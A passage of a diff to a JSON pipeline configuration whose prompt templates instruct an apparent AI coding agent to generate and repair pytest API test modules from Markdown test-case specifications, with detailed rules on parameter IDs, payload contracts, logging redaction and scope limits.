summary), and both records must be visible in pytest stdout/stderr without changing assertions. Recursively redact sensitive values and apply bounded truncation before logging.\n\nMaterialize every automatable Markdown Case exactly once as one canonical primary pytest symbol. Preserve every explicit variant Test Point as a stable pytest.param id and every assertion/cross-cutting binding as declared. Build request payloads from the effective Markdown test data literally: keep all declared DTO keys, nested shapes, enum values, missing/null/boundary variants and business-state preconditions; never substitute guessed convenience fields or rename contract fields. Never assert an identifier's concrete Python/JSON type unless the Markdown or bound contract explicitly declares that type; when only presence is required, accept any non-null scalar identifier and serialize it safely into the path. For a nonexistent-resource 404 Case whose identifier syntax/type is not declared, obtain a syntactically valid identifier from a live create response and delete it before the 404 request; never invent an arbitrary UUID/text identifier that may fail path conversion with 400. Respect every local helper's actual return signature: never tuple-unpack a scalar status/id/helper result, and never treat a tuple response as a scalar.\n\nDo not read source/**, add cases, reassign ACs, modify conftest/config/production code, use skip/xfail, swallow assertions, execute pytest, or emit JSON. For best-effort cleanup, catch only the narrow transport exception actually raised by the selected HTTP client (for example `requests.RequestException` or `urllib.error.URLError`); never use bare `except`, `Exception`, or `BaseException` with `pass`.",
|
|
453
|
+
"subtaskPromptTemplate": "Convert the single frozen Markdown module `{{item.markdownPath}}` into one self-contained pytest module. Before writing, also read the run-owned Markdown plan artifact at `{{item.planReadPath}}` and use its explicit API target/environment table as the authoritative fallback base URL for every module. A task/Markdown `API_BASE_URL` target takes precedence over project README dev-server URLs; never infer a backend API fallback from a frontend/Vite port such as localhost:3000. After reading the module Markdown, the run-owned plan artifact, and the bounded pytest config/conftest, immediately use write tools to create the single frozen file `{{item.pytestPath}}`. Define any bounded HTTP client fixture, request logging/redaction/truncation helper and payload builders needed by this module inside that same file; do not import generated testcase/**/helpers/** or testcase/**/factories/** assets. Do not end after analysis or planning. Do not modify Markdown, conftest, helpers/factories, or any other module's pytest script.\n\nOutput budget protocol (hard, max output <=16K per turn): Write exactly the frozen `{{item.pytestPath}}`. Never paste full Python modules into assistant chat. Do not merge or split modules. Do not reduce params/assertions/skips to fit. If OUTPUT_LIMIT_RECOVERY is injected, continue only listed missing/broken scripts.\n\nAlign every variant pytest.param payload with the Markdown scenario intent (empty/missing/null/length/pattern/enum/wrong-type/nominal). Prefer literal payloads over Faker for intent-critical fields so pre-execution scenario-param checks can verify them. Hard contract: intent=enum-invalid MUST pass a concrete invalid value literal (string/number/boolean), never `_OMIT`/None/missing key; intent=missing/empty may use `_OMIT` or delete the key; intent=custom-literal:trim|whitespace-padded requires a leading/trailing whitespace string with non-empty trimmed content (all-whitespace belongs to empty/whitespace-only, not trim); intent=custom-literal:ACTIVE|ARCHIVED requires the exact enum string, never descriptive tokens like filter-active; intent=max/min/max+1 should pass a repeated-string length expression, a bare length number N, or a helper named _*_LEN{N} / _*_MAX_LENGTH / _*_OVER_LENGTH — never a bare 1 for oversize. Hard contract: request payload dicts may only contain DTO field keys from Payload Allowed Paths; never put expect/expected/echo_* helper keys inside the JSON body dict. Path/query/header identifiers and scenario-control metadata (including `id`, expected codes, and selector labels) must stay in separate pytest parameters and helper arguments; never merge them into a DTO patch or JSON body unless that exact path is allowed by the Markdown payload contract. Normalize the configured API base URL with `rstrip(\"/\")` (or equivalently join exactly one slash) before appending endpoint paths; generated requests must never contain a `//api/...` path. When the bound source documents a concrete non-secret local API URL, generated clients must use it as the fallback in `os.environ.get(\"API_BASE_URL\", \"<documented-url>\")`; do not require an otherwise-uninjected environment variable or fail setup solely because it is absent. Missing-field helpers must remove keys idempotently with `payload.pop(field, None)`, never `del payload[field]`, because optional fields may already be absent.\n\nFor every response contract that requires an object or pagination envelope, first assert that each envelope/data value is a dict and that required keys exist, then index fields and assert values. Never let an incidental KeyError or list/string TypeError stand in for the explicit response-shape contract failure.\n\nEnsure every automatable final Markdown Case ID in this module appears in exactly one primary pytest test function or pytest test class method region, using the exact `primary symbol` declared by Markdown. Skip evidence-only meta Cases that declare `脚本/primary symbol=无` with empty variants; do not invent a business pytest symbol for them. The symbol must start with `test_BE_<MODULE>_<NNN>_` so every parameterized collected item remains associated with its Case. Module-level functions and class-based pytest methods are both supported. Only `变体测试点` may use stable `pytest.param(..., id=\"TP-...\")` IDs, and every atomic variant ID must appear exactly once with a genuine input/state/outcome change. A Case with exactly one variant Test Point still needs one literal `pytest.param(..., id=\"TP-...\")` row; never leave a single-variant Case as a bare function with the TP only in the docstring. Use a literal direct `pytest.param(..., id=...)` expression for every row; never hide or wrap it behind `_post_case`, `_put_case`, row-factory functions, comprehensions, generators, or dynamically returned parameter lists; do not use decorator-level `ids=[...]`, generated suffixes, or IDs that extend/shorten the exact Markdown TP. Do not parameterize `场景断言测试点` or `横切证据测试点`; execute all assertion checkpoints within the same business journey/item and use shared helpers for cross-cutting evidence. Governance-only cross-cutting bindings such as writeSet compliance, execution count, report existence, or orchestration state are metadata-only in business pytest: preserve their IDs in `Cross-Cutting-Test-Points`, but never assert `__file__`, filesystem placement, pytest invocation count, Harness state, or report artifacts inside the business test. Harness-owned evidence verifies those bindings. The primary symbol docstring must contain exact metadata lines `Case-ID: BE-...`, `Assertion-Test-Points: TP-...;TP-...` and `Cross-Cutting-Test-Points: TP-...;TP-...` (use `none` when empty). Implement request dictionaries so their direct and nested key paths and enum literals exactly satisfy the Case `Payload Required Paths`, `Payload Allowed Paths`, and `Payload Enum`; for `Payload Contract: none`, do not invent a JSON/body DTO. GET/list filters still declare query fields in those payload labels when the Case varies `params=`/`query=` keys. Python `True`/`False` may implement JSON/OpenAPI `true`/`false` query or body booleans. GET/DELETE setup journeys may create resources, but their setup DTO must not change the target operation's no-body payload contract. No Test Point may be invented, renamed, omitted or bound in two modes. The generated pytest collection shape must equal the Markdown prediction `sum(max(1, variant count per Case))`; keep it at or below the task's explicit budget by removing duplicate execution, never by collapsing multiple parameter rows under a coarse family TP. Assertions come only from 预期结果 and setup comes only from 前置条件/测试数据/自动化映射.\n\nName the generated pytest file so it corresponds one-to-one with its source Markdown module file: this module stem `{{item.stem}}` maps to exactly the frozen `{{item.pytestPath}}`. The <module> stem is the Markdown filename without the `.md` extension, lowercased and with non-alphanumeric characters replaced by underscores. For example, `resource_notes` → `testcase/test_resource_notes.py`, `health` → `testcase/test_health.py`. If Markdown automation mapping names a different path than this module stem path, still write the frozen manifest pytest path and do not invent prefixes. Never merge multiple Markdown modules into one pytest file, never split one module across several files, and never invent pytest filenames unrelated to the Markdown modules.\n\nScenario Partition slots: every `TP-<Partition ID>-...` variant Test Point declared by this module's Markdown MUST become exactly one literal direct `pytest.param(..., id=\"TP-<Partition ID>-...\")` row with the exact slot ID; the not-in-set slot passes a concrete literal absent from the documented Domain (e.g. `UNKNOWN_TYPE`) — never `_OMIT`, never a descriptive token. Never split one slot into multiple params or merge several slots under a family TP id. Slot filtering requests hit the documented list endpoint with the slot value as the query/path filter.\n\nKeep this module self-contained: define module-local fixtures and helpers directly in `{{item.pytestPath}}`, so pytest discovers every fixture dependency without external plugin registration. The request log must include method, URL/path, and request parameters (query plus JSON/body/payload summary). The response log must include status code and response result (JSON/text/body summary), and both records must be visible in pytest stdout/stderr without changing assertions. Recursively redact sensitive values and apply bounded truncation before logging.\n\nMaterialize every automatable Markdown Case exactly once as one canonical primary pytest symbol. Preserve every explicit variant Test Point as a stable pytest.param id and every assertion/cross-cutting binding as declared. Build request payloads from the effective Markdown test data literally: keep all declared DTO keys, nested shapes, enum values, missing/null/boundary variants and business-state preconditions; never substitute guessed convenience fields or rename contract fields. Never assert an identifier's concrete Python/JSON type unless the Markdown or bound contract explicitly declares that type; when only presence is required, accept any non-null scalar identifier and serialize it safely into the path. For a nonexistent-resource 404 Case whose identifier syntax/type is not declared, obtain a syntactically valid identifier from a live create response and delete it before the 404 request; never invent an arbitrary UUID/text identifier that may fail path conversion with 400. Respect every local helper's actual return signature: never tuple-unpack a scalar status/id/helper result, and never treat a tuple response as a scalar.\n\nDo not read source/**, add cases, reassign ACs, modify conftest/config/production code, use skip/xfail, swallow assertions, execute pytest, or emit JSON. For best-effort cleanup, catch only the narrow transport exception actually raised by the selected HTTP client (for example `requests.RequestException` or `urllib.error.URLError`); never use bare `except`, `Exception`, or `BaseException` with `pass`.",
|
|
454
454
|
"outputContract": "Write exactly the frozen pytest module file `{{item.pytestPath}}` whose actual test function region contains the exact Case ID, preferably in the function name or docstring. the frozen `{{item.markdownPath}}` maps one-to-one to `{{item.pytestPath}}`; never merge or split modules. No JSON and no pytest execution.",
|
|
455
455
|
"toolProfile": "write",
|
|
456
456
|
"writePolicy": "exclusive",
|
|
@@ -530,7 +530,7 @@
|
|
|
530
530
|
],
|
|
531
531
|
"runIf": "$.nodes['assess-backend-pytest-collection-shell'].json.repairEligible == true",
|
|
532
532
|
"complexity": "MED",
|
|
533
|
-
"subtask_prompt": "Repair the generated backend pytest asset as one bounded program using the direct upstream collection assessment. This is the only repair attempt and happens before any business test body execution. The direct upstream JSON includes authoritative `repairPaths` and bounded `repairFindings`; treat both as the complete mandatory checklist without searching for a run directory or report file. Treat any upstream line such as `Repair paths: testcase/test_x.py` as equivalent authoritative repairPaths evidence. Directly read and edit that testcase path; do not search for separate root-level `contracts/**`, guess a DAG run directory, or require another report artifact. If the read tool successfully returns the testcase file, the path exists—continue the bounded repair and never later claim that file is absent.\n\nInitial status REPAIRABLE means at least one listed finding remains: `already-satisfied` is forbidden, and you must produce a non-empty bounded diff on repairPaths before returning `IMPLEMENTATION_OUTCOME: changed`. Fix only readiness-proven generated testcase-local defects on initial facts repairPaths: create exact safe missing mapped test_*.py paths, repair syntax/import/symbol/decorator/parameterization, close generated fixture dependencies/plugin registration, and repair initial Markdown-to-pytest correspondence findings. Use this deterministic repair map instead of reading analyzer implementation: findings about `Case-ID`, `Assertion-Test-Points`, or `Cross-Cutting-Test-Points` are fixed by
|
|
533
|
+
"subtask_prompt": "Repair the generated backend pytest asset as one bounded program using the direct upstream collection assessment. This is the only repair attempt and happens before any business test body execution. The direct upstream JSON includes authoritative `repairPaths` and bounded `repairFindings`; treat both as the complete mandatory checklist without searching for a run directory or report file. Treat any upstream line such as `Repair paths: testcase/test_x.py` as equivalent authoritative repairPaths evidence. Directly read and edit that testcase path; do not search for separate root-level `contracts/**`, guess a DAG run directory, or require another report artifact. If the read tool successfully returns the testcase file, the path exists—continue the bounded repair and never later claim that file is absent.\n\nInitial status REPAIRABLE means at least one listed finding remains: `already-satisfied` is forbidden, and you must produce a non-empty bounded diff on repairPaths before returning `IMPLEMENTATION_OUTCOME: changed`. Fix only readiness-proven generated testcase-local defects on initial facts repairPaths: create exact safe missing mapped test_*.py paths, repair syntax/import/symbol/decorator/parameterization, close generated fixture dependencies/plugin registration, and repair initial Markdown-to-pytest correspondence findings. Use this deterministic repair map instead of reading analyzer implementation: findings about `Case-ID`, `Assertion-Test-Points`, or `Cross-Cutting-Test-Points` are fixed by editing the declared primary symbol docstring metadata lines; variant binding findings are fixed in the literal direct `pytest.param(..., id=\"TP-...\")` row; primary-symbol cardinality/name findings are fixed in the function name or duplicate primary symbols; script mismatch is fixed only on the authoritative assessment repairPaths; payload findings are fixed in request payload construction. Do not read controller `src/**` or inspect JS/TS analyzer code. Do not search for `testcase/**/README.md`. Never invent a business pytest symbol for evidence-only Markdown Cases that declare `脚本/primary symbol=无` with empty variants. For fixture defects inspect both provider and importer listed by repairPaths; fix ScopeMismatch by aligning fixture scopes or inlining request-scoped values so module fixtures never depend on function fixtures; when a shared fixture depends on sibling fixtures, register the whole provider module through an exact pytest_plugins declaration rather than importing only the outer fixture. Do not create unrelated pytest scripts.\n\nThis is the single pytest incremental synchronization round. The `Findings` in `reports/backend-test-pytest-collection-initial.md` are the mandatory repair checklist: resolve every repairable listed finding on every authoritative `Repair paths` file before considering any other advisory evidence, and never substitute an unrelated scenario-param cleanup for a listed correspondence/collection defect. For every assessment-listed path, compare the effective Markdown Case/Test Points/test data and its `Payload Contract`/`Payload Required Paths`/`Payload Allowed Paths`/`Payload Enum` labels with the generated module. Incrementally add or repair only missing symbols, params, assertions and payload builders. Repair every assessment-listed missing nested path, unexpected key and enum mismatch; preserve exact DTO keys, nested shapes, enum/boundary literals, operation transport and business preconditions; remove guessed replacement keys only when the effective Markdown proves the exact contract. Keep path/query/header identifiers and scenario-control metadata separate from DTO patches and JSON bodies; an `id` used for a path target must be passed to the request path/helper, never inserted into a body patch unless `id` is explicitly listed in Payload Allowed Paths. Flatten every variant into a literal direct `pytest.param(..., id=\"TP-...\")` row; replace `_post_case`/`_put_case` or other parameter-row factories because correspondence and scenario readiness require the actual row values and IDs to be statically visible. Also repair helper call sites to match their defined return signatures; do not tuple-unpack a helper that returns one scalar value.\n\nPreserve final testcase/md/** semantics, every Case ID, Rule/Test Point binding, primary symbol, parameter ID, expected status/body/schema assertion, HTTP logging, redaction and truncation behavior.\n\nUse local edit only on assessment-listed paths; keep summaries short; never rewrite unrelated modules.\n\nDo not reinterpret requirements beyond the effective Markdown and bounded assessment diagnostics. Do not modify Markdown, conftest, pytest config, production code or dependencies.\n\nDo not add skip/skipif/xfail, remove tests, reduce collected items, loosen assertions, swallow exceptions, use try/except ImportError fallback, mutate sys.path/PYTHONPATH, or replace the real API with mocks.\n\nDo not execute pytest; the deterministic effective collection gate owns the final collection attempt.",
|
|
534
534
|
"executor": "pi",
|
|
535
535
|
"role": "implementer",
|
|
536
536
|
"toolProfile": "write",
|